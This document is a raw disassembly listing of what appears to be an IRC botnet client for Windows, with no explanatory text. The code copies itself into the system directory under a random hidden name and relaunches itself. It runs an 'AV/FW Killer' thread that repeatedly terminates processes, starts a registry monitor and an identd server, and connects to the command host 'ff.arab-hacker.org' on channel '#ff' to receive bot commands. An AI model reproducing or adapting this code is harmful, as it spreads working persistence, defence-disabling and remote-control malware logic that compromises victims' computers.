sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset aProcListingPro ; "[PROC]: Listing processes:"
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_408B42
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_405E64
add esp, 14h
loc_408B42: ; CODE XREF: sub_408AE3+3D�j
push [ebp+var_10] ; int
lea eax, [ebp+Str]
push esi ; int
push esi ; Str2
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_4088B4
add esp, 18h
test eax, eax
jnz short loc_408B6A
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_408B6F
; ---------------------------------------------------------------------------
loc_408B6A: ; CODE XREF: sub_408AE3+7E�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_408B6F: ; CODE XREF: sub_408AE3+85�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_408BA2
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_405E64
add esp, 14h
loc_408BA2: ; CODE XREF: sub_408AE3+9D�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_14]
call sub_411F56
pop ecx
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
sub_408AE3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408BC1 proc near ; CODE XREF: sub_409557+3EA9�p
; sub_411D75+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_41B10C ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_408BF3
push 0
push esi
call ds:dword_41B104 ; TerminateProcess
test eax, eax
jnz short loc_408BF3
push esi
xor edi, edi
call ds:dword_41B050 ; CloseHandle
loc_408BF3: ; CODE XREF: sub_408BC1+1A�j
; sub_408BC1+27�j
mov eax, edi
pop edi
pop esi
retn
sub_408BC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_408BF8 proc near ; DATA XREF: WinMain(x,x,x,x)+3CA�o
push esi
xor esi, esi
loc_408BFB: ; CODE XREF: sub_408BF8+1E�j
push 1 ; int
push esi ; int
push esi ; Str2
push esi ; int
push esi ; Str
push esi ; int
call sub_4088B4
add esp, 18h
push dword_421F04
call ds:dword_41B048 ; Sleep
jmp short loc_408BFB
sub_408BF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+C9�p
var_99C = dword ptr -99Ch
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
Ext = byte ptr -6F8h
Filename = byte ptr -5F8h
Str = byte ptr -4F8h
SubStr = byte ptr -3F4h
FullPath = byte ptr -2F0h
Dest = byte ptr -1ECh
var_E8 = dword ptr -0E8h
var_DC = dword ptr -0DCh
var_BC = dword ptr -0BCh
var_B8 = word ptr -0B8h
Source = byte ptr -0A4h
Dst = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], offset sub_403DCB
push [ebp+var_C]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_41B078
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4750D0, eax
call esi ; GetTickCount
push eax
call sub_41274C
pop ecx
call sub_405EFF
push 2
call dword_42EC5C ; SetErrorMode
push 7530h
push offset aFenr ; "FEnR"
push ebx
push ebx
call ds:dword_41B120 ; CreateMutexA
push eax
call ds:dword_41B11C ; WaitForSingleObject
cmp eax, 102h
jnz short loc_408C98
push 1
call ds:dword_41B090 ; ExitProcess
loc_408C98: ; CODE XREF: WinMain(x,x,x,x)+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_42EB38 ; WSAStartup
cmp eax, ebx
mov [ebp+var_C], eax
jnz loc_40926E
cmp [ebp+var_888], 2
jnz loc_409268
xor eax, eax
mov al, [ebp+var_887]
cmp al, 2
jnz loc_409268
mov esi, 104h
lea eax, [ebp+SubStr]
push esi
push eax
call ds:dword_41B098 ; GetSystemDirectoryA
lea eax, [ebp+FullPath]
push esi
push eax
push ebx
call ds:dword_41B0CC ; GetModuleHandleA
push eax
call ds:dword_41B068 ; GetModuleFileNameA
lea eax, [ebp+Ext]
push eax ; Ext
lea eax, [ebp+Filename]
push eax ; Filename
push ebx ; Dir
lea eax, [ebp+FullPath]
push ebx ; Drive
push eax ; FullPath
call __splitpath
lea eax, [ebp+Ext]
push eax
lea eax, [ebp+Filename]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
lea eax, [ebp+FullPath]
push eax ; Str
call _strstr
add esp, 30h
test eax, eax
jnz loc_408F0D
cmp dword_424A58, ebx
mov esi, offset aGvujaleodq_exe ; "gvujaleodq.exe"
jz short loc_408D93
push esi ; Str
xor edi, edi
call _strlen
sub eax, 4
pop ecx
jz short loc_408D93
loc_408D70: ; CODE XREF: WinMain(x,x,x,x)+179�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
push esi ; Str
add dl, 61h
mov byte ptr aGvujaleodq_exe[edi], dl ; "gvujaleodq.exe"
inc edi
call _strlen
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_408D70
loc_408D93: ; CODE XREF: WinMain(x,x,x,x)+148�j
; WinMain(x,x,x,x)+156�j
lea eax, [ebp+SubStr]
push esi
push eax
lea eax, [ebp+Dest]
push offset aSS_0 ; "%s\\%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
call ds:dword_41B0A8 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_408DD3
lea eax, [ebp+Dest]
push 80h
push eax
call ds:dword_41B000 ; SetFileAttributesA
loc_408DD3: ; CODE XREF: WinMain(x,x,x,x)+1A7�j
mov esi, ds:dword_41B118
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
xor edi, edi
push eax
loc_408DEA: ; CODE XREF: WinMain(x,x,x,x)+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_408E23
call ds:dword_41B060 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_408E23
cmp eax, 20h
jz short loc_408E04
cmp eax, 5
jnz short loc_408E23
loc_408E04: ; CODE XREF: WinMain(x,x,x,x)+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_41B048 ; Sleep
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
push eax
jmp short loc_408DEA
; ---------------------------------------------------------------------------
loc_408E23: ; CODE XREF: WinMain(x,x,x,x)+1D6�j
; WinMain(x,x,x,x)+1E0�j ...
lea eax, [ebp+Dest]
push eax
call sub_407184
pop ecx
lea eax, [ebp+Dest]
push 7
push eax
call ds:dword_41B000 ; SetFileAttributesA
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_E8]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_E8], esi
mov [ebp+var_DC], offset byte_428D64
mov [ebp+var_B8], bx
push 1
pop esi
mov [ebp+var_BC], esi
call ds:dword_41B114 ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_41B10C ; OpenProcess
lea ecx, [ebp+FullPath]
push ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+SubStr]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_98C]
push ebx
push eax
lea eax, [ebp+Dest]
push eax
call ds:dword_41B094 ; CreateProcessA
test eax, eax
jz short loc_408F0D
push 0C8h
call ds:dword_41B048 ; Sleep
push [ebp+Dst]
mov esi, ds:dword_41B050
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_42EB20 ; WSACleanup
push ebx
call ds:dword_41B090 ; ExitProcess
loc_408F0D: ; CODE XREF: WinMain(x,x,x,x)+137�j
; WinMain(x,x,x,x)+2CB�j
cmp dword_475540, 2
jle short loc_408F59
mov eax, dword_475544
push dword ptr [eax+4] ; Str
call _atoi
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_41B11C ; WaitForSingleObject
push esi
call ds:dword_41B050 ; CloseHandle
mov eax, dword_475544
cmp [eax+8], ebx
jz short loc_408F59
push 7D0h
call ds:dword_41B048 ; Sleep
mov eax, dword_475544
push dword ptr [eax+8]
call ds:dword_41B110 ; DeleteFileA
loc_408F59: ; CODE XREF: WinMain(x,x,x,x)+2FC�j
; WinMain(x,x,x,x)+326�j
cmp dword_424A5C, ebx
jz short loc_408F76
cmp dword_42EC80, ebx
jnz short loc_408F76
lea eax, [ebp+Str]
push eax ; Str
call sub_402FA4
pop ecx
loc_408F76: ; CODE XREF: WinMain(x,x,x,x)+347�j
; WinMain(x,x,x,x)+34F�j
lea eax, [ebp+Source]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push ebx ; int
push eax ; Source
call sub_411C3A
lea eax, [ebp+Source]
push eax
call sub_402D63
push 0B80h ; Size
push ebx ; Val
push offset Str1 ; Dst
call _memset
lea eax, [ebp+Source]
push offset aProcsAvFwKille ; "[PROCS]: AV/FW Killer active."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 1 ; int
push eax ; Source
call sub_411C3A
add esp, 38h
mov edi, eax
mov esi, ds:dword_41B064
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_408BF8
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_430554[edi], eax
jnz short loc_409016
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset aProcsFailedToS ; "[PROCS]: Failed to start AV/FW killer t"...
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_409016: ; CODE XREF: WinMain(x,x,x,x)+3E1�j
lea eax, [ebp+Source]
push eax ; Format
call sub_402D63
lea eax, [ebp+Source]
mov [esp+99Ch+var_99C], offset aSecureRegistry ; "[SECURE]: Registry monitor active."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 1 ; int
push eax ; Source
call sub_411C3A
add esp, 14h
mov edi, eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+Str]
push ebx
push eax
push offset sub_403014
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_430554[edi], eax
jnz short loc_409089
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset aSecureFailedTo ; "[SECURE]: Failed to start registry thre"...
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_409089: ; CODE XREF: WinMain(x,x,x,x)+454�j
lea eax, [ebp+Source]
push eax
call sub_402D63
push 2
call sub_411E82
pop ecx
test eax, eax
pop ecx
jnz short loc_40910E
lea eax, [ebp+Source]
push offset aIdentdServerRu ; "[IDENTD]: Server running on Port: 113."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 2 ; int
push eax ; Source
call sub_411C3A
add esp, 14h
mov edi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push edi
push offset sub_405C73
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_430554[edi], eax
jnz short loc_409101
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset aIdentdFailedTo ; "[IDENTD]: Failed to start server, error"...
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_409101: ; CODE XREF: WinMain(x,x,x,x)+4CC�j
lea eax, [ebp+Source]
push eax
call sub_402D63
pop ecx
loc_40910E: ; CODE XREF: WinMain(x,x,x,x)+488�j
call _rand
push 0Ah
xor edx, edx
pop ecx
div ecx
push 7Fh ; Count
push offset aFf_arabHacker_ ; "ff.arab-hacker.org"
push offset byte_4750DC ; Dest
mov dword_475254, edx
call _strncpy
mov eax, dword_424A3C
push 3Fh ; Count
mov edi, offset byte_47515C
push offset aFf ; "#ff"
push edi ; Dest
mov dword_47522C, eax
call _strncpy
push 3Fh ; Count
mov esi, offset byte_47519C
push offset aFuckoff ; "fuckoff"
push esi ; Dest
call _strncpy
add esp, 24h
mov dword_475230, ebx
loc_409168: ; CODE XREF: WinMain(x,x,x,x)+5F6�j
; WinMain(x,x,x,x)+601�j ...
mov [ebp+var_4], ebx
loc_40916B: ; CODE XREF: WinMain(x,x,x,x)+5AA�j
cmp dword_42EC98, ebx
jnz short loc_409189
lea eax, [ebp+var_14]
push ebx
push eax
call dword_42EB08 ; InternetGetConnectedState
test eax, eax
jnz short loc_409189
push 7530h
jmp short loc_4091B5
; ---------------------------------------------------------------------------
loc_409189: ; CODE XREF: WinMain(x,x,x,x)+559�j
; WinMain(x,x,x,x)+568�j
push offset dword_4750D8
mov dword_475250, ebx
call sub_409277
cmp eax, 2
mov [ebp+var_C], eax
jz loc_409263
cmp dword_475250, ebx
jz short loc_4091B0
dec [ebp+var_4]
loc_4091B0: ; CODE XREF: WinMain(x,x,x,x)+593�j
push 0BB8h
loc_4091B5: ; CODE XREF: WinMain(x,x,x,x)+56F�j
call ds:dword_41B048 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40916B
cmp [ebp+var_C], 2
jz loc_409263
cmp [ebp+var_10], ebx
jz short loc_409213
push 7Fh ; Count
push offset aFf_arabHacker_ ; "ff.arab-hacker.org"
push offset byte_4750DC ; Dest
call _strncpy
mov eax, dword_424A3C
push 3Fh ; Count
push offset aFf ; "#ff"
push edi ; Dest
mov dword_47522C, eax
call _strncpy
push 3Fh ; Count
push offset aFuckoff ; "fuckoff"
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_10], ebx
jmp loc_409168
; ---------------------------------------------------------------------------
loc_409213: ; CODE XREF: WinMain(x,x,x,x)+5B9�j
cmp byte_475244, bl
jz loc_409168
push 7Fh ; Count
push offset byte_475244 ; Source
push offset byte_4750DC ; Dest
call _strncpy
mov eax, dword_424A40
push 3Fh ; Count
push offset byte_475248 ; Source
push edi ; Dest
mov dword_47522C, eax
call _strncpy
push 3Fh ; Count
push offset byte_47524C ; Source
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_10], 1
jmp loc_409168
; ---------------------------------------------------------------------------
loc_409263: ; CODE XREF: WinMain(x,x,x,x)+587�j
; WinMain(x,x,x,x)+5B0�j
call sub_411E03
loc_409268: ; CODE XREF: WinMain(x,x,x,x)+A4�j
; WinMain(x,x,x,x)+B4�j
call dword_42EB20 ; WSACleanup
loc_40926E: ; CODE XREF: WinMain(x,x,x,x)+97�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409277 proc near ; CODE XREF: WinMain(x,x,x,x)+57C�p
; DATA XREF: sub_409557+3363�o
var_190 = dword ptr -190h
Args = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dest = byte ptr -2Ch
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_40929C: ; CODE XREF: sub_409277+E6�j
; sub_409277+136�j ...
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_42EBB4 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+Args]
push eax
call sub_4082EB
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_4093C9
push 1Ch ; Size
lea eax, [ebp+Dest]
push 0 ; Val
push eax ; Dst
call _memset
push 0 ; Str1
lea eax, [ebp+Dest]
push dword_424A6C ; int
push dword_424A68 ; int
push eax ; Dest
call sub_40FA38
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh ; Count
add eax, offset byte_430558
push edi ; Source
push eax ; Dest
call _strncpy
add esp, 28h
push 6
push 1
push 2
call dword_42EC30 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_43054C[eax], esi
lea eax, [ebp+Dst]
push eax
push esi
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_409362
push esi
call dword_42EC48 ; closesocket
call sub_408314
push 7D0h
loc_409357: ; CODE XREF: sub_409277+146�j
call ds:dword_41B048 ; Sleep
jmp loc_40929C
; ---------------------------------------------------------------------------
loc_409362: ; CODE XREF: sub_409277+CD�j
lea eax, [ebp+Args]
push eax ; Args
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_402DD7
push [ebp+var_38]
lea eax, [ebp+Args]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_4093DF
add esp, 28h
mov edi, eax
push esi
call dword_42EC48 ; closesocket
test edi, edi
jz loc_40929C
cmp edi, 1
jnz short loc_4093BF
push 0DBBA0h
jmp short loc_409357
; ---------------------------------------------------------------------------
loc_4093BF: ; CODE XREF: sub_409277+13F�j
cmp edi, 2
jz short loc_4093CD
jmp loc_40929C
; ---------------------------------------------------------------------------
loc_4093C9: ; CODE XREF: sub_409277+5A�j
xor eax, eax
jmp short loc_4093D9
; ---------------------------------------------------------------------------
loc_4093CD: ; CODE XREF: sub_409277+14B�j
push [ebp+var_34]
call sub_411F56
pop ecx
push 2
pop eax
loc_4093D9: ; CODE XREF: sub_409277+154�j
pop edi
pop esi
leave
retn 4
sub_409277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093DF proc near ; CODE XREF: sub_409277+123�p
Dst = byte ptr -1A10h
var_A10 = dword ptr -0A10h
var_240 = dword ptr -240h
Str1 = byte ptr -1A0h
Str = byte ptr -0A0h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A10h
call __alloca_probe
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+Str1]
pop ecx
loc_4093FD: ; CODE XREF: sub_4093DF+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_4093FD
cmp byte_475240, bl
jz short loc_409424
push offset byte_475240 ; Args
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0] ; int
call sub_405E1E
add esp, 0Ch
loc_409424: ; CODE XREF: sub_4093DF+2E�j
push [ebp+arg_C]
lea eax, [ebp+Dest]
push ebx ; Str1
push ebx ; int
push 2 ; int
push eax ; Dest
call sub_40FA38
add esp, 10h
push eax
lea eax, [ebp+Str]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_0]
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40948E
push [ebp+arg_0]
call dword_42EC48 ; closesocket
push 1388h
call ds:dword_41B048 ; Sleep
loc_409487: ; CODE XREF: sub_4093DF+D9�j
; sub_4093DF+153�j
xor eax, eax
loc_409489: ; CODE XREF: sub_4093DF+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40948E: ; CODE XREF: sub_4093DF+92�j
; sub_4093DF+F8�j ...
mov esi, 1000h
lea eax, [ebp+Dst]
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_42EBCC ; recv
test eax, eax
jle short loc_409487
lea eax, [ebp+var_A10]
push eax ; int
lea eax, [ebp+Dst]
push eax ; Str
call sub_406E70
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_40948E
lea edi, [ebp+var_A10]
loc_4094DF: ; CODE XREF: sub_4093DF+165�j
push 1
pop esi
loc_4094E2: ; CODE XREF: sub_4093DF+144�j
push [ebp+arg_1C] ; int
lea eax, [ebp+var_8]
push esi ; File
push eax ; int
lea eax, [ebp+var_240]
push eax ; int
lea eax, [ebp+Str1]
push eax ; Str1
push [ebp+arg_18] ; int
push [ebp+arg_C] ; Dest
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+arg_0] ; int
push dword ptr [edi] ; Src
call sub_409557
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_409525
push 7D0h
call ds:dword_41B048 ; Sleep
jmp short loc_4094E2
; ---------------------------------------------------------------------------
loc_409525: ; CODE XREF: sub_4093DF+137�j
cmp esi, 0FFFFFFFDh
jz short loc_40954F
cmp esi, 0FFFFFFFEh
jz short loc_40954B
cmp esi, 0FFFFFFFFh
jz loc_409487
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_4094DF
jmp loc_40948E
; ---------------------------------------------------------------------------
loc_40954B: ; CODE XREF: sub_4093DF+14E�j
push 1
jmp short loc_409551
; ---------------------------------------------------------------------------
loc_40954F: ; CODE XREF: sub_4093DF+149�j
push 2
loc_409551: ; CODE XREF: sub_4093DF+16E�j
pop eax
jmp loc_409489
sub_4093DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409557(char *Src,int,int,int,char *Dest,int,char *Str1,int,int,char *File,int)
sub_409557 proc near ; CODE XREF: sub_4093DF+12A�p
var_159C = byte ptr -159Ch
var_119C = byte ptr -119Ch
var_F9C = byte ptr -0F9Ch
var_D9C = byte ptr -0D9Ch
var_C9C = byte ptr -0C9Ch
var_C98 = byte ptr -0C98h
Filename = byte ptr -0B98h
var_B94 = byte ptr -0B94h
var_A94 = byte ptr -0A94h
var_A14 = byte ptr -0A14h
var_9B3 = byte ptr -9B3h
var_9B2 = byte ptr -9B2h
var_9B0 = byte ptr -9B0h
var_9AF = byte ptr -9AFh
var_9A6 = byte ptr -9A6h
var_9A4 = byte ptr -9A4h
var_9A2 = byte ptr -9A2h
var_9A1 = byte ptr -9A1h
var_914 = dword ptr -914h
var_910 = byte ptr -910h
var_80C = dword ptr -80Ch
var_808 = dword ptr -808h
var_804 = byte ptr -804h
var_7F8 = dword ptr -7F8h
var_7F4 = dword ptr -7F4h
var_7F0 = byte ptr -7F0h
var_788 = byte ptr -788h
var_778 = dword ptr -778h
var_774 = byte ptr -774h
var_770 = byte ptr -770h
var_744 = dword ptr -744h
var_740 = byte ptr -740h
var_704 = dword ptr -704h
var_700 = byte ptr -700h
var_6F4 = byte ptr -6F4h
var_6F0 = byte ptr -6F0h
var_6C0 = byte ptr -6C0h
var_689 = byte ptr -689h
var_688 = byte ptr -688h
var_680 = byte ptr -680h
var_674 = byte ptr -674h
var_670 = byte ptr -670h
var_600 = byte ptr -600h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = byte ptr -5F0h
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_570 = dword ptr -570h
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_548 = byte ptr -548h
var_4F8 = dword ptr -4F8h
var_4F4 = byte ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = byte ptr -4ECh
var_4E0 = dword ptr -4E0h
var_4DC = byte ptr -4DCh
var_4AC = dword ptr -4ACh
var_48C = dword ptr -48Ch
var_474 = byte ptr -474h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = dword ptr -454h
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_444 = byte ptr -444h
var_430 = byte ptr -430h
var_420 = byte ptr -420h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_3F8 = dword ptr -3F8h
var_3F4 = byte ptr -3F4h
FullPath = byte ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3C4 = byte ptr -3C4h
var_3A0 = byte ptr -3A0h
var_384 = byte ptr -384h
var_374 = byte ptr -374h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2D8 = word ptr -2D8h
var_2D6 = word ptr -2D6h
Drive = dword ptr -2D4h
Dst = byte ptr -2C8h
var_C8 = dword ptr -0C8h
var_C4 = byte ptr -0C4h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
SubStr = byte ptr -0A0h
Str2 = dword ptr -94h
Args = byte ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
Str = dword ptr -84h
Format = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_18 = byte ptr -18h
Source = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
arg_14 = dword ptr 1Ch
Str1 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
File = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 159Ch
call __alloca_probe
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_A8], 3
mov [ebp+var_10], ebx
mov [ebp+var_AC], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_C8], ebx
call _memset
push 1Bh ; Count
lea eax, [ebp+var_564]
push [ebp+Dest] ; Source
push eax ; Dest
call _strncpy
add esp, 18h
cmp [ebp+Src], ebx
jz loc_4099D2
push esi ; Size
lea eax, [ebp+var_F9C]
push ebx ; Val
push eax ; Dst
call _memset
dec esi
lea eax, [ebp+var_F9C]
push esi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_F9C]
push offset asc_427350 ; " :"
push eax ; Str
call _strstr
mov [ebp+var_C], eax
lea eax, [ebp+var_F9C]
push esi ; Count
push eax ; Source
lea eax, [ebp+var_119C]
push eax ; Dest
call _strncpy
mov esi, offset Delim ; " "
lea eax, [ebp+var_119C]
push esi ; Delim
push eax ; Str
call _strtok
add esp, 34h
mov [ebp+Str2], eax
lea edi, [ebp+Args]
mov [ebp+var_A4], 1Fh
loc_40962A: ; CODE XREF: sub_409557+E7�j
push esi ; Delim
push ebx ; Str
call _strtok
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_A4]
pop ecx
jnz short loc_40962A
mov esi, [ebp+Str2]
cmp esi, ebx
jz loc_4099D2
cmp dword ptr [ebp+Args], ebx
jz loc_4099D2
push 100h ; Size
lea eax, [ebp+var_A14]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea ecx, [ebp+var_18]
push 1Fh
pop edx
push 1
pop edi
loc_409678: ; CODE XREF: sub_409557+153�j
mov eax, [ecx]
cmp eax, ebx
